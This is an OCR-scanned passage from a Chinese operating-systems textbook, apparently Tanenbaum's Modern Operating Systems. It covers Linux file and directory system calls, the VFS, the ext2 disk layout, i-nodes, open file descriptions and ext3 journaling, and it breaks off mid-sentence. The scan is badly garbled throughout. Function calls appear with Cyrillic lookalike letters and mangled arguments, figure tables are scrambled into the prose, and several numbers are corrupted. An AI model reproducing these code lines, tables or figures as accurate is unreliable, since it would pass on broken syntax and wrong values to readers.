19 = creat(name,mode) 创建 新 文件 的 一 种 方法 
fd = ореп(їйе, һом, 2) _ | 打开 文件 读 、 写 或 者 读 写 
s = close(fd) 关闭 一 个 已 经 打开 的 文件 _ 

аа(а, buffer, nbytes) | 从 文件 中 读 取 数据 到 一 个 缓冲 区 

п = write(fd, buffer nbytes) | 把 数据 从 缓冲 区 写 到 文件 _ J 
position = Iseek(fd, offset, whence) | 移动 文件 指针 а | 
s = stat(name, 8ш) 获取 一 个 文件 的 状态 信息 
s = fstat(fd, &buf) 获取 一 个 文件 的 状态 信息 
з = pipe(&fd[0]) 创建 一 个 管道 | 
Ís = tenfa, cma) | 文件 加 镇 及 其 他 提 人 


图 10-27 跟 文件 相关 的 一 些 系统 调用 。 如 果 发 生 错误 ， 那 么 返回 值 是 一 1， 
fd 是 一 个 文件 描述 符 ，position 是 文件 偏 移 。 参 数 的 含义 是 很 清楚 的 


虽然 几乎 所 有 程序 都 是 顺序 读 写 文件 的 , 但 是 一 些 程序 需要 能 够 从 文件 的 任何 位 置 随机 地 读 写 文件 。 
每 个 文件 都 有 一 个 指针 指向 文件 当前 的 读 写 位 置 。 当 顺序 地 读 写 文件 时 ， 这 个 指针 指向 将 要 读 写 的 字 节 。 
如 果 文件 位 置 指针 最 初 指向 4096， 在 读 取 了 1024 个 字 节 后 ， 它 会 自动 地 指向 第 5120 个 字 节 。lseek 系 统 
调用 可 以 改变 位 置 指针 的 值 ， 所 以 之 后 的 read 和 write 可 以 从 文件 的 任何 位 置 开始 读 写 ， 甚 至 是 超出 文件 
的 结尾 。 这 个 系统 调用 叫做 lseek， 是 为 了 避免 与 seek 冲 突 ， 其 中 后 者 以 前 在 16 位 计算 机 上 用 于 查找 ， 
现在 已 经 不 使 用 了 。 

lseek 有 三 个 参数 ， 第 一 个 是 文件 描述 符 ， 第 二 个 是 文件 读 写 位 置 ， 第 三 个 表明 读 写 位 置 是 相对 于 
文件 开头 、 当 前 位 置 还 是 文件 尾 。lseek 的 返回 值 是 当 读 写 位 置 改变 后 的 绝对 位 置 。 有 点 讽刺 的 是 ， 
lseek 是 惟一 一 个 从 不 会 引起 实际 的 磁盘 寻 道 的 文件 系统 调用 ， 因 为 它 所 做 的 只 是 修改 了 内 存 中 的 一 个 
值 (文件 读 写 位 置 ) 。 

对 于 每 个 文件 ，Linux 记 录 了 它 的 文件 类 型 (普通 文件 、 目 录 、 特 殊 文件 ) 、 大 小 、 最 后 一 次 修改 时 
间 和 其 他 信息 。 程 序 可 以 使 用 stat 系 统 调用 来 查看 这 些 信息 ，stat 的 第 一 个 参数 是 文件 名 ， 第 二 个 参数 是 
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指向 获取 的 文件 信息 将 要 存放 的 结构 的 指针 ， 该 结构 的 各 个 域 如 图 10-28 所 示 。 系 统 调 用 fstat 的 作用 和 
stat 一 样 ， 惟 一 不 同 的 是 ，fstat 针 对 


存储 文件 的 设备 


一 个 打开 的 文件 (文件 名 可 能 未 知 ) РЕБ Е ЕЕЕ - 
进行 操作 ， 而 不 是 一 个 路 径 名 。 站 文件 模式 包括 保护 信息 ) | 
pipe 系 统 调用 用 来 创建 一 个 shell ЕВЕ 
管线 。 它 创建 了 一 种 伪 文 件 (pseudo- ТТТ 
file) ， 用 于 缓冲 管线 通信 的 数据 ， 并 上 文件 所 属 的 组 
给 缓冲 区 的 读 写 都 返回 文件 描述 符 。 文件 大 小 (单位 是 字 节 ) 
以 下 面 的 管线 为 例 : 创建 时 间 
sort <in | head —30 | 最 近 访问 的 时 间 ТЕЕ 
在 执行 sort 的 进程 中 ， 文 件 描述 最 近 修改 的 时 间 
符 1 (标准 输出 ) 被 设置 为 写 入 管道 ， 图 10-28 stat 系 统 调用 返回 的 域 


执行 head 的 进程 中 ， 文 件 描述 符 0 ( 标 
准 输入 ) 被 设置 为 从 管道 读 取 。 通 过 这 种 方式 ，sort 只 是 从 文件 描述 符 0 (被 设置 为 文件 in) 读 取 ， 写 人 
到 文件 描述 符 1 (管道 )， 甚 至 不 会 觉察 到 它们 已 经 被 重 定向 了 。 如 果 它 们 没有 被 重 定向 ，sort 将 会 自动 
从 键盘 读 取 数据 ， 而 后 输出 到 显示 器 (默认 设备 )。 同 样 地 ， 当 head 从 文件 描述 符 0 中 读 取 数 据 时 ， 它 读 
取 到 的 是 sort 写 人 到 管道 缓冲 区 中 的 数据 ，head 甚 至 不 知道 自己 使 用 了 管道 。 这 个 例子 清晰 地 表明 了 一 个 
简单 的 概念 ( 重 定向 ) 和 一 个 简单 的 实现 (文件 描述 符 0 和 1) 如 何 实现 一 个 强大 的 工具 (以 任意 方式 连 
接 程序 ， 而 不 需要 去 修改 它们 )。 

图 10-27 列 举 的 最 后 一 个 系统 调用 是 fcntl。fcntl 用 于 加 锁 和 解锁 文件 ， 应 用 共享 锁 和 互 斥 锁 ， 或 者 
是 执行 一 些 文件 相关 的 其 他 操作 。 

现在 我 们 开始 关注 与 目录 及 文件 系统 整体 更 加 相关 ， 而 不 是 仅 和 单个 文件 有 关 的 系统 调用 ， 图 
10-29 列 举 了 一 些 这 样 的 系统 调用 。 == 


可 以 使 用 mkdir 和 rmdir 创 建 和 删除 目 женл я в _ 
、 J s=mkdir (path, mode) 建立 新 目录 

ж, 但 需要 注意 : 只 有 目录 为 空 时 才 [s=rmair (ра) 副 除 目录 ка 
可 以 将 其 串 除 。 | э=їпк (oldpath, newpath) | 创建 指向 已 有 文件 的 链接 

如 图 10-24 所 示 ， 创 建 一 个 指向 к (path) 取消 文件 的 链接 
已 有 文件 的 链接 时 创建 了 一 个 目录 项 | s=chdir (path) gy 改变 工作 目录 
(directory entry) 。 系 统 调用 link 用 于 | dir=opendir (path) 打开 目录 T 图 
创建 链接 ， 它 的 参数 是 已 有 文件 的 文 | s=alosedir (din 关闭 目录 Ет 
件 名 和 链接 的 名 称 ， 使 用 unlink 可 以 。 | dirent=readdir (di | 读 取 一 个 月 录 项 
删除 目录 项 。 当 文件 的 最 后 一 个 链接 | rewinddir (dir) | 回转 目录 使 其 再 次 被 读 取 


As 
Н Н; 。 图 10-29 与 目录 相关 的 -一些 系 统 调用 。 如 果 发 生 错误 ， 那 么 
用 unlink 也 会 让 它 从 目录 中 消失 。 返回 值 s 是 -1，dir 是 一 个 目录 流 ，dirent 是 一 个 目录 项 。 
使 用 chdir 系 统 调用 可 以 改变 工作 参数 的 含义 是 自 解释 的 
目录 ， 工 作 目 录 的 改变 会 影响 到 相对 路 径 名 的 解释 。 
图 10-29 给 出 的 最 后 四 个 系统 调用 是 用 于 读 取 目录 的 。 和 普通 文件 类 似 ， 它 们 可 被 打开 、 关 闭 和 读 
取 。 每 次 调用 readdir 都 会 以 固定 的 格式 返回 一 个 目录 项 。 用 户 不 能 对 目录 执行 写 操作 (为 了 保证 文件 系 
统 的 完整 性 )， 但 可 以 使 用 creat 或 link 在 文件 夹 中 创建 一 个 目录 ， 或 使 用 unlink 删 除 一 个 目录 。 同 样 地 ， 
用 户 不 能 在 目录 中 查找 某 个 特定 文件 ， 但 是 可 以 使 用 rewinddir 作 用 于 一 个 打开 的 目录 ， 使 得 它 能 再 次 从 
头 读 取 。 


10.6.3 Linux 文 件 系统 的 实现 
在 本 节 中 ， 我 们 首先 研究 虚拟 文件 系统 (Virtual File System, VFS) 层 支持 的 抽象 。VFS 对 高 层 进 
程 和 应 用 程序 隐藏 了 Linux 支 持 的 所 有 文件 系统 之 间 的 区 别 ， 以 及 文件 系统 是 存储 在 本 地 设备 ， 还 是 需 
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要 通过 网 络 访问 的 远程 设备 。 设 备 和 其 他 特殊 文件 也 可 以 通过 VFS 访 问 。 接 下 来 ， 我 们 将 描述 第 一 个 被 
Linux 广 泛 使 用 的 文件 系统 ext2 (second extended file system)。 随 后 ， 我 们 将 讨论 ext3 文 件 系统 中 所 作 的 
改进 。 所 有 的 Linux 都 能 处 理 有 多 个 磁盘 分 区 且 每 个 分 区 上 有 一 个 不 同文 件 系统 的 情况 。 

1. Linux 虚拟 文件 系统 

为 了 使 应 用 程序 能 够 与 在 本 地 或 远程 设备 上 的 不 同文 件 系统 进行 交互 ，Linux 采 用 了 一 个 被 其 他 
UNIX 系 统 使 用 的 方法 : 虚拟 文件 系统 。VFS 定 义 了 一 个 基本 的 文件 系统 抽象 以 及 这 些 抽象 上 允许 的 操 
作 集 合 。 调 用 上 节 中 提 到 的 系统 调用 访问 VFS 的 数据 结构 ， 确 定 要 访问 的 文件 所 属 的 文件 系统 ， 然 后 通 
过 存储 在 VFS 数 据 结构 中 的 函数 指针 调用 该 文件 系统 的 相应 操作 。 

图 10-30 总 结 了 VFS 支 持 的 四 个 主要 


的 文件 系统 结构 。 其 中 ， 起 级 块 包含 T 文 ”| 对象 | 描述 操作 

件 系 统 布局 的 重要 信息 ， 破 坏 了 超级 块 将 。“ | Superblock | 特定 的 文件 系统 read_inode,sync_fs 
会 导致 文件 系统 无 法 访问 。 每 个 节点 (i- Шешу | 目录 项 ， 路径 的 一 个 组 成 部 分 | create ink 

node, index-node 的 简写 ， 但 是 从 来 不 这 样 I-node 特定 的 文件 d_compare,d_delete 
称呼 它 ， 而 一 些 人 省 略 了 “-” 并 称 之 为 [Ee 跟 一 个 进程 相关 联 的 打开 文件 | read,write 

节点 ) 表示 某 个 确切 的 文件 。 值 得 注意 的 10:30 VFS 支持 的 文件 系统 抽象 


是 在 Linux 中 ， 目 录 和 设备 也 当 作 是 文件 ， 
所 以 它们 也 有 自己 对 应 的 i 节 点 。 超 级 块 和 i 节 点 都 有 相应 的 结构 ， 由 文件 系统 所 在 的 物理 磁盘 维护 。 

为 了 便于 目录 操作 及 路 径 (比如 lusrlasVbin) 的 遍历 ，VFS 支 持 dentry 数 据 结构 ， 它 表示 一 个 目录 项 。 
这 个 数据 结构 由 文件 系统 在 运行 过 程 中 创建 。 目 录 项 被 缓存 在 dentry_cache 中 ， 比 如 ，dentry_cache 会 包 
含 /，/usr，/usr/ast 的 目录 项 如 果 多 个 进程 通过 同一 个 硬 连 接 ( 即 相同 路 径 ) 访问 同一 个 文件 ， 它 们 的 
文件 对 象 都 会 指向 这 个 cache 中 的 同一 个 目录 项 。 

file 数 据 结构 是 一 个 打开 文件 在 内 存 中 的 表示 ， 并 且 在 调用 open 系 统 调用 时 被 创建 。 它 支持 read、 
write、sendfile、lock 等 上 一 节 中 提 到 的 系统 调用 。 

在 VFS 下 层 实 现 的 实际 文件 系统 并 不 需要 在 内 部 使 用 与 VFS 完 全 相同 的 抽象 和 操作 ， 但 是 必须 实现 
跟 VFS 对 象 所 指定 的 操作 在 语义 上 等 价 的 文件 系统 操作 。 这 四 个 VFS 对 象 中 的 operations 数 据 结构 的 元 素 
都 是 指向 底层 文件 系统 函数 的 指针 。 

2. Linux ext2 文件 系统 

接 下 来 ， 我 们 介绍 在 Linux 中 最 流行 的 磁盘 文件 系统 : ext2。 第 一 个 Linux 操 作 系统 使 用 MINIX 文 件 
系统 ， 但 是 它 限制 了 文件 名 长 度 并 且 文件 长 度 最 大 只 能 是 64MB。 后 来 MINIX 被 第 一 个 扩展 文件 系统 ， 
ext 文 件 系统 取代 。ext 可 以 支持 长 文件 名 和 大 文件 ， 但 由 于 它 的 效率 问题 ，ext 被 ext2 代 替 ，ext2 在 今天 
还 在 广泛 使 用 。 

ext2 的 磁盘 分 区 包含 了 一 个 如 图 10-31 所 示 的 文件 系统 。 块 0 不 被 Linux 使 用 ， 而 通常 用 来 存放 启动 
计算 机 的 代码 。 在 块 0 后 面 ， 磁 盘 分 区 被 划分 为 若干 个 块 组 ， 划 分 时 不 考虑 磁盘 的 物理 结构 。 每 个 块 组 
的 结构 如 下 : 

第 一 个 块 是 超级 块 ， 它 包含 了 该 文件 系统 的 信息 ， 包 括 i 节 点 的 个 数 、 磁 盘 块 数 以 及 空闲 块 链表 的 
起 始 位 置 (通常 有 几 百 个 项 )。 下 一 个 是 组 描述 符 ， 存 放 了 位 图 (bitmap) 的 位 置 、 空 闲 块 数 、 组 中 的 i 
节点 数 ， 以 及 组 中 目录 数 等 信息 ， 这 个 信息 很 重要 ， 因 为 ext2 试 图 把 目录 均匀 地 分 散 存储 到 磁盘 上 。 


引导 | 所 so 块 组 1 块 组 2 


Р 块 组 4 


i 节点 | 数据 块 


图 10-31 Linux ext2 文 件 系统 的 磁盘 布局 


超级 | 组 描 | 块 位 | 节点 
块 | 述 符 图 | 位 图 
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两 个 位 图 分 别 记录 空闲 块 和 空闲 i 节 点 ， 这 是 从 MINIXI 文 件 系统 继承 的 (大 多 数 UNIX 文 件 系统 不 
使 用 位 图 ， 而 使 用 空闲 列表 )。 每 一 个 位 图 的 大 小 是 一 个 块 。 如 果 一 个 块 大 小 是 1KB ， 那 么 就 限制 了 块 
数 和 i 节 点 数 只 能 是 8192 个 。 块 数 是 一 个 严格 的 限制 ， 但 是 在 实际 应 用 中 ，i 节 点 数 并 不 是 。 

在 超级 块 之 后 是 i 节 点 存储 区 域 ， 它 们 被 编号 为 1 到 某 个 最 大 值 。 每 个 i 节 点 的 大 小 是 128 字 节 ， 并 且 
每 一 个 节点 恰好 描述 一 个 文件 。i 节 点 包含 了 统计 信息 (包含 了 stat 系 统 调用 能 获得 的 所 有 信息 ， 实 际 上 
stat 就 是 从 i 节点 读 取信 息 的 )， 也 包含 了 所 有 存放 该 文件 数据 的 磁盘 块 的 位 置 。 

在 i 节点 区 后 面 是 数据 块 区 ， 所 有 文件 和 目录 都 存放 在 这 个 区 域 。 对 于 一 个 包含 了 一 个 以 上 磁盘 块 
的 文件 和 目录 ， 这 些 磁盘 块 是 不 需要 连续 的 。 实 际 上 ， 一 个 大 文件 的 块 有 可 能 遍布 在 整个 磁盘 上 。 

目录 对 应 的 i 节点 散布 在 磁盘 块 组 中 。 如 果 有 足够 的 空间 ，ext2 会 把 普通 文件 组 织 到 与 父 目录 相同 的 块 
组 上 ， 而 把 同一 个 块 上 的 数据 文件 组 织 成 初始 文件 i 节点 。 这 个 思想 来 自 Berkeley 的 快速 文件 系统 
(McKusick 等 人 ，1984)。 位 图 用 于 快速 确定 在 什么 地 方 分 配 新 的 文件 系统 数据 。 在 分 配 新 的 文件 块 时 ， 
ext2 也 会 给 该 文件 预 分 配 许多 (ВИХ) 额外 的 数据 块 ， 这 样 可 以 减少 将 来 向 该 文件 写 人 数据 时 产生 的 文件 碎 
片 。 这 种 策略 在 整个 磁盘 上 实现 了 文件 系统 负载 平衡 ， 而 且 由 于 排列 和 缩减 文件 碎片 ， 它 的 性 能 也 很 好 。 

要 访问 文件 ， 必 须 首先 使 用 一 个 Linux 系 统 调用 ， 例 如 open， 该 调用 需要 文件 的 路 径 名 。 解 析 路 径 
名 以 解析 出 单独 的 目录 。 如 果 使 用 相对 路 径 ， 则 从 当前 进程 的 当前 目录 开始 查找 ， 否 则 就 从 根 目录 开始 。 
在 以 上 两 种 情况 中 ， 第 一 个 目录 的 i 节 点 很 容易 定位 : 在 进程 描述 符 中 有 指向 它 的 指针 ， 或 者 在 使 用 根 
目录 的 情况 下 ， 它 存储 在 磁盘 上 预定 的 块 上 。 

目录 文件 允许 不 超过 255 个 字符 的 文件 名 ， 如 图 10-32 所 示 。 每 一 个 目录 都 由 整数 个 磁盘 块 组 成 ， 这 
样 目录 就 可 以 整体 写 人 磁盘 。 在 一 个 目录 中 ,文件 和 子 目录 的 目录 项 是 未 排序 的 ， 并 且 一 个 紧 乒 着 一 个 。 
目录 项 不 能 跨越 磁盘 块 ， 所 以 通常 在 每 个 磁盘 块 的 尾部 会 有 部 分 未 使 用 的 字 节 。 


i 地 点 号 
项 大 小 
类 型 
TA 文件 名 长 度 
а) |19; 'F:8 ; colossal |42 :Е:10: voluminous 10:6: bigdir ГГ 


图 10-32 а) 一 个 含有 三 个 文件 的 Linux 目 录 ，b) 文件 voluminous 被 删除 后 的 目录 


图 10-32 中 的 每 个 目录 项 由 四 个 固定 长 度 的 域 和 一 个 可 变 长 度 的 域 组 成 。 第 一 个 域 是 i 节点 号 ,文件 
colossal 的 i 节点 号 是 19, 文件 voluminous 的 节点 号 是 42， 目 录 bigdir 的 i 节点 号 是 88。 接 下 来 是 rec_len 域 ， 
标明 该 目录 项 的 大 小 (以 字 节 为 单位 )， 可 能 包括 名 字 后 面 的 一 些 填充 。 在 名 字 以 未 知 长 度 填充 时 ， 这 
个 域 被 用 来 寻找 下 一 个 目录 项 。 这 也 是 图 10-32 中 箭头 的 含义 。 接 下 来 是 类 型 域 ， 文件 、 目 录 等 。 最 后 
一 个 固定 域 是 文件 名 的 长 度 (以 字 节 为 单位 )， 在 例子 中 是 8、10 和 6。 最 后 是 文件 名 ， 文 件 名 以 字 节 0 结 
东 ， 并 被 填充 到 32 字 节 边界 。 额 外 的 填充 可 以 在 此 之 后 。 

在 图 10-32b 中 ， 我 们 看 到 的 是 文件 voluminous 的 目录 项 被 移 除 后 同一 个 目录 的 内 容 。 这 是 通过 增加 
colossal 的 域 的 长 度 ， 将 voluminous 以 前 所 在 的 域 变 为 第 一 个 目录 项 的 填充 。 当 然 ， 这 个 填充 可 以 用 来 作 
为 后 续 的 目录 项 。 

由 于 目录 是 按 线性 顺序 查找 的 ， 要 找到 一 个 位 于 大 目录 末尾 的 目录 项 会 耗费 相当 长 的 时 间 。 因 此 ， 
系统 为 近期 访问 过 的 目录 维护 一 个 缓存 。 该 缓存 使 用 文件 名 进行 查找 ， 如 果 命 中 ， 那 么 就 可 以 避免 费时 


N 


\ 
| 
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的 线性 查找 。 组 成 路 径 的 每 个 部 分 都 在 目录 缓存 中 保存 一 个 dentry 对 象 ， 并 且 通 过 它 的 i 节点 查找 到 后 续 
的 路 径 元 素 的 目录 项 ， 直 到 找到 真正 的 文件 节点。 

例如 ， 要 通过 绝对 路 径 名 来 查找 一 个 文件 (如 ， /usr/asUfile) ， 需 要 经 过 如 下 步骤 。 首先， 系统 定 
位 根 目录 ， 它 通常 使 用 2 号 i 节点 (特别 是 当 1 号 i 节点 被 用 来 处 理 磁盘 坏 块 的 时 候 )。 系 统 在 目录 缓存 中 存 
放 一 条 记录 以 便 将 来 对 根 目 录 的 查找 。 然 后 ， 在 根 目录 中 查找 字符 申 “usr"， 得 到 /usr 目 录 的 ;节点 号 。 
/usr 目录 的 i 节 点 号 同样 也 存 人 目录 缓存 。 然 后 这 个 i 节 点 被 取出 ， 并 从 中 解析 出 磁盘 块 ， 这 样 就 可 读 取 
/usr 目 录 并 查找 字符 串 “ast" 。 一 旦 找到 这 个 目录 项 ， 目 录 /usr/ast 的 i 节 点 号 就 可 以 从 中 获得 。 有 了 
Wusr/ast 的 i 节点 号 ， 就 可 以 读 取 i 节 点 并 确定 目录 所 在 的 磁盘 块 。 最 后 ， 从 /usr/ast 目 录 查 找 “file” 并 确定 
其 i 节点 号 。 因 此 ， 使 用 相对 地 址 不 仅 对 用 户 来 说 更 加 方便 ， 而 且 也 为 系统 节省 了 大 量 的 工作 。 

如 果 文件 存在 ， 那 么 系统 提取 其 i 节点 号 并 以 它 为 索引 在 i 节点 表 (在 磁盘 上 ) 中 定位 相应 的 节点， 
并 装 和 人 内 存 。i 节 点 被 存放 在 i 节点 表 中 ， 其 中 i 节点 表 是 一 个 内 核 数据 结构 ， 用 于 保存 所 有 当前 打开 的 文 
件 和 目录 的 i 节点 。i 节 点 表 项 的 格式 至 少 要 包含 stat 系 统 调用 返回 的 所 有 域 ， 以 保证 stat 正 常 运行 ( 见 图 
10-28)。 图 10-33 中 列 出 了 i 节 点 结构 中 由 Linux 文 件 系统 层 支持 的 一 些 域 。 实 际 的 i 节 点 结构 包含 更 多 的 
域 ， 这 是 由 于 该 数据 结构 也 用 于 表示 目录 、 设 备 以 及 其 他 特殊 文件 。i 节 点 结构 中 还 包含 了 一 些 为 将 来 
的 应 用 保留 的 域 。 历 史 已 经 表明 未 使 用 的 位 不 会 长 时 间 保持 这 种 方式 。 


域 | 字 节 数 | 描 述 
Mode 2 | 文件 类 型 、 保 护 位 、setuid 和 setgid 位 
Ninks | 2 | 指向 该 节点 的 目录 项 的 数目 | 
Uid 2 | 文件 属 主 的 UID R 
[ва 2 | 文件 属 主 的 GID 
| Size 4 | 文件 大 小 (以 字 节 为 单位 ) 


Addr | 60 112 个 磁盘 块 及 其 后 面 3 个 间接 块 的 地 址 
Gen | 1 generation 数 (每 次 ;节点 被 重用 时 增加 ) _ 
Aime | 4 | 最 近 访 问 文件 的 时 间 

Mtime | 4 | 最 近 修改 文件 的 时 间 _ 

Ctime | а | 最 近 改 变节 点 的 时 间 (除去 其 他 时 间 ) 


图 10-33 Linux 的 i 节 点 结构 中 的 一 些 域 


现在 来 看 看 系统 如 何 读 取 文件 。 对 于 调用 了 read 系 统 调用 的 库 函 数 的 一 个 典型 使 用 是 ; 

n= read(fd, buffer nbytes); 

当 内 核 得 到 控制 权时 ， 它 需要 从 这 三 个 参数 以 及 内 部 表 中 与 用 户 有 关 的 信息 开始 。 内 部 表 中 的 项 目 之 一 
是 文件 描述 符 数组 。 文 件 描述 符 数组 用 文件 描述 符 作为 索引 并 为 每 一 个 打开 的 文件 保存 一 个 表 项 (最 多 
达到 最 大 值 ， 通 常 默认 是 32 个 )。 

这 里 的 思想 是 从 一 个 文件 描述 符 开 始 ， 找 到 文件 对 应 的 i 节点 为 止 。 考 虑 一 个 可 能 的 设计 ， 在 文件 
描述 符 表 中 存放 一 个 指向 ;节点 的 指针 。 尽 管 这 很 简单 ， 但 不 幸 的 是 这 个 方法 不 能 奏效 。 其 中 存在 的 问 
BE: 与 每 个 文件 描述 符 相关 联 的 是 用 来 指明 下 一 次 读 ( 写 ) 从 哪个 字 节 开始 的 文件 读 写 位 置 ， 它 该 放 
在 什么 地 方 ?一 个 可 能 的 方法 是 将 它 放 到 i 节点 表 中 。 但 是 ， 当 两 个 或 两 个 以 上 不 相关 的 进程 同时 打开 
同一 个 文件 时 ， 由 于 每 个 进程 有 自己 的 文件 读 写 位 置 ， 这 个 方法 就 失效 了 。 

另 一 个 可 能 的 方法 是 将 文件 读 写 位 置 放 到 文件 描述 符 表 中 。 这 样 ， 每 个 打开 文件 的 进程 都 有 自己 的 
文件 读 写 位 置 。 不 幸 的 是 ， 这 个 方法 也 是 失败 的 ， 但 是 其 原因 更 加 微妙 并 且 与 Linux 的 文件 共享 的 本 质 
有 关 。 考 虑 一 个 shell 脚 本 s， 它 由 顺序 执行 的 两 个 命令 pl 和 p2 组 成 。 如 果 访 shell 脚 本 在 命令 行 

S >X 
下 被 调用 ， 我 们 预期 p1 将 它 的 输出 写 到 x 中 ， 然 后 p2 也 将 输出 写 到 x 中 ， 并 且 从 p1 结 束 的 地 方 开始 。 

当 shell 生 成 pI 时 ，x 初 始 是 空 的 ， 从 而 pl 从 文件 位 置 0 开始 写 信 。 然 而 ， 当 p1 结 束 时 就 必须 通过 某 种 
机 制 使 得 p2 看 到 的 初始 文件 位 置 不 是 0 (如 果 将 文件 位 置 存放 在 文件 描述 符 表 中 ，p2 将 看 到 0) ， 而 是 pl 
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结束 时 的 位 置 。 

实现 这 一 点 的 方法 如 图 10-34 所 示 。 实 现 的 技巧 是 在 文件 描述 符 表 和 i 节 点 表 之 间 引 入 一 个 新 的 表 ， 
则 做 打开 文件 描述 表 ， 并 将 文件 读 写 位 置 (以 及 读 / 写 位 ) 放 到 里 面 。 在 这 个 图 中 ， 父 进程 是 shell 而 子 进 
程 首先 是 p1 然 后 是 p2。 当 shell 生 成 pl 时 ，p1 的 用 户 结构 (包括 文件 描述 符 表 ) 是 shell 的 用 户 结构 的 一 个 
副本 ， 因 此 两 者 都 指向 相同 的 打开 文件 摘 述 表 的 表 项 。 当 pl 结束 时 ，shell 的 文件 描述 符 仍然 指向 包含 p1 
的 文件 位 置 的 打开 文件 描述 。 当 shell 生 成 p2 时 ， 新 的 子 进程 自动 继承 文件 读 写 位 置 ， 甚 至 p2 和 shell 都 不 
需要 知道 文件 读 写 位 置 到 底 是 在 哪里 。 

然而 ， 当 不 相关 的 进程 打开 该 文件 时 ， 它 将 得 到 自己 的 打开 文件 描述 表 项 ， 以 及 自己 的 文件 读 写 位 
置 ， 而 这 正 是 我 们 所 需要 的 。 因 此 ， 打 开 文件 描述 表 的 重点 是 允许 父 进程 和 子 进程 共享 一 个 文件 读 写 位 
置 ， 而 给 不 相关 的 进程 提供 各 自私 有 的 值 。 

再 来 看 读 操作 ， 我 们 已 经 说 明了 如 何 定位 文件 读 写 位 置 和 i 节 点 。i 节 点 包含 文件 前 12 个 数据 块 的 磁 
盘 地 址 。 如 果 文件 位 置 是 在 前 12 个 块 ， 那 么 这 个 块 被 读 入 并 且 其 中 的 数据 被 复制 给 用 户 。 对 于 长 度 大 于 
12 个 数据 块 的 文件 ，i 节 点 中 有 一 个 域 包含 一 个 一 级 间接 块 的 磁盘 地 址 ， 如 图 10-34 所 示 。 这 个 块 含有 更 
多 的 磁盘 块 的 磁盘 地 址 。 例 如 ， 如 果 一 个 磁盘 块 大 小 为 1KB 而 磁盘 地 址 长 度 是 4 字 节 ， 那 么 这 个 一 级 间 
接 块 可 以 保存 256 个 磁盘 地 址 。 因 此 这 个 方案 对 于 总 长 度 在 268KB 以 内 的 文件 适用 。 


打开 文件 描述 i 节点 

文件 位 置 
RW 

指向 节点 的 指针 


父 进程 的 文件 
搞 述 符 表 


子 进程 的 文件 
描述 符 表 


的 文件 描述 
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不 相关 进程 | 


/ 
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图 10-34 文件 描述 符 表 、 打 开 文件 描述 表 和 i 节点 表 之 间 的 关系 


除 此 之 外 ， 还 使 用 一 个 二 级 间接 块 。 它 包含 256 个 一 级 间接 块 的 地 址 ， 每 个 一 级 间接 块 保存 256 个 数 
据 块 的 地 址 。 这 个 机 制 能 够 处 理 10+2" 个 块 (67 119 104 字 节 )。 如 果 这 样 仍然 不 够 ， 那 和 ;节点 为 三 级 间 
接 块 留 下 了 空间 ， 三 级 间接 块 的 指针 指向 许多 二 级 间接 块 。 这 个 寻 址 方案 能 够 处 理 大 小 为 2 个 1IKB 块 
(16GB) 的 文件 。 对 于 块 大 小 是 8KB 的 情况 ， 这 个 寻 址 方案 能 够 支持 最 大 64TB 的 文件 。 

3. Linux Ext3 文 件 系统 

为 了 防止 由 系统 崩溃 和 电源 故障 造成 的 数据 丢失 ，ext2 文 件 系统 必须 在 每 个 数据 块 创建 之 后 立即 将 
其 写 出 到 磁盘 上 。 必需 的 磁盘 磁头 寻 道 操作 导致 的 延迟 是 如 此 之 长 以 至 于 性 能 差 得 无 法 让 人 接受 。 因 此 ， 
写 操作 被 延迟 ， 对 文件 的 改动 可 能 在 30 秒 内 都 不 会 提交 给 磁盘 ， 而 相对 于 现代 的 计算 机 硬件 来 说 ， 这 是 
一 段 相 当 长 的 时 间 间 隔 。 
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为 了 增强 文件 系统 的 健壮 性 ，Linux 依 靠 日 志文 件 系统 。Ext3， 作 为 Ext2 文 件 系统 的 改进 ， 就 是 一 
个 日 志文 件 系统 的 例子 。 

这 种 文件 系统 背后 的 基本 思想 是 维护 一 个 日 志 ， 该 日 志 顺 序 记录 所 有 文件 系统 操作 。 通 过 顺序 写 出 
文件 系统 数据 或 元 数据 (i 节点 ， 超 级 块 等 ) 的 改动 ， 该 操作 不 必 有 忍受 随 机 磁盘 访问 时 磁头 移动 带 来 的 
开销 。 最 后 ， 这 些 改动 将 被 写 到 适当 的 磁盘 地 址 ， 而 相应 的 日 志 项 可 以 被 丢弃 。 如 果 系 统 出 潢 或 电源 故 
障 在 改动 提交 之 前 发 生 ， 那 么 在 重启 动 过 程 中 ， 系 统 将 检测 到 文件 系统 没有 被 正确 地 印 载 。 然 后 系统 追 
历 日 志 ， 并 执行 日 志 记录 所 描述 的 文件 系统 改动 。 

Ext3 设 计 成 与 Ext2 高 度 兼容 ， 事 实 上 ， 两 个 系统 中 所 有 的 核心 数据 结构 和 磁盘 布局 都 是 相同 的 。 此 
外 ， 一 个 作为 ext2 系 统 被 卸载 的 文件 系统 随后 可 以 作为 ext3 系 统 被 加 载 并 提供 日 志 能 力 。 

日 志 是 一 个 以 环形 缓冲 器 形式 组 织 的 文件 。 日 志 可 以 存储 在 主 文件 系统 所 在 的 设备 上 也 可 以 存储 在 
其 他 设备 上 。 由 于 日 志 操作 本 身 不 被 日 志 记 录 ， 这 些 操作 并 不 是 被 日 志 所 在 的 ext3 文 件 系统 处 理 的 ， 而 
是 使 用 一 个 独立 的 日 志 块 设备 (Journaling Block Device，JBD) 来 执行 日 志 的 读 / 写 操作 。 

JBD 支 持 三 个 主要 数据 结构 : 日 志 记录 、 原 子 操作 处 理 和 事务 。 一 个 日 志 记录 描述 一 个 低级 文件 系 
统 操作 ， 该 操作 通常 导致 块 内 变化 。 鉴 于 系统 调用 (如 write) 包含 多 个 地 方 的 改动 一 i 节点 、 现 有 的 文 
件 块 、 新 的 文件 块 、 空 闲 块 列表 等 ， 所 以 将 相关 的 日 志 记录 按照 原子 操作 分 成 组 。Ext3 将 系统 调用 过 程 的 
起 始 和 结束 通知 JBD， 这 样 JBD 能 够 保证 一 个 原子 操作 中 的 所 有 日 志 记 录 或 者 都 被 应 用 ， 或 者 没有 一 个 被 
应 用 。 最 后 ， 主 要 从 效率 方面 考虑 ，JBD 将 原子 操作 的 汇集 作为 事务 对 待 。 一 个 事务 中 日 志 记录 是 连续 存 
储 的 。 仅 当 一 个 事务 中 的 所 有 日 志 记 录 都 被 安全 提交 到 磁盘 后 ，JBD 才 允许 日 志文 件 的 相应 部 分 被 丢弃 。 

把 每 个 磁盘 改动 的 日 志 记 录 项 写 到 磁盘 可 能 开销 很 大 ，ext3 可 以 配置 为 保存 所 有 磁盘 改动 的 日 志 或 
